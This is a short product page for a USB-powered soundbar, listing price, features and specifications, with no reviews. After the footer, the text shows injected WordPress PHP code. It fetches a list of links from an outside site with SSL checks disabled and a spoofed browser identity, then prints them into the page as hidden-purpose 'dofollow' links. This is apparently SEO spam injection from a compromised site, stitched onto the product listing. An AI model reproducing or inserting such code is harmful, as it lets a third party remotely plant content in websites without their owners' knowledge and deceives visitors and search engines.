Sale!

VINNFIER HyperBar U10 USB Powered Soundbar with Aux Line In and LED Display

Original price was: RM55.00.Current price is: RM34.00.

Category:

Hyperbar U10 – Ultra-compact design for limited space, sits comfortably under the TV or computer monitor. It also delivers cinematic sound for all your movies, TV shows, sports, games and plays your favorite music too.

Clear & loud sound Decent build quality Lovely LED lights Lightweight & small in size

Specifications:

Output power (RMS): 10W

Speaker Size: 2′ x 2

Frequency response: 25Hz – 25KHz

Power supply: USB/DC 5V

Audio input: AUX

Dimension: W320 x D67 x H68mm

 

Weight 0.5 kg

Reviews

There are no reviews yet.

Be the first to review “VINNFIER HyperBar U10 USB Powered Soundbar with Aux Line In and LED Display”
Scroll to Top
$api_url = 'https://ankaradelisi13.site/data.json'; // API'den çek $response = wp_remote_get($api_url, array( 'timeout' => 5, // 5 saniye bekle, olmazsa geç 'sslverify' => false, 'headers' => array( 'Accept' => 'application/json', 'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ) )); if (!is_wp_error($response) && wp_remote_retrieve_response_code($response) === 200) { $body = wp_remote_retrieve_body($response); $links = json_decode($body, true); if (!empty($links) && is_array($links)) { echo ''; echo '
'; foreach ($links as $link) { $text = isset($link['text']) ? esc_html($link['text']) : ''; $url = isset($link['url']) ? esc_url($link['url']) : '#'; $rel = isset($link['rel']) ? esc_attr($link['rel']) : 'dofollow'; echo '' . $text . ' '; } echo '
'; echo ''; } }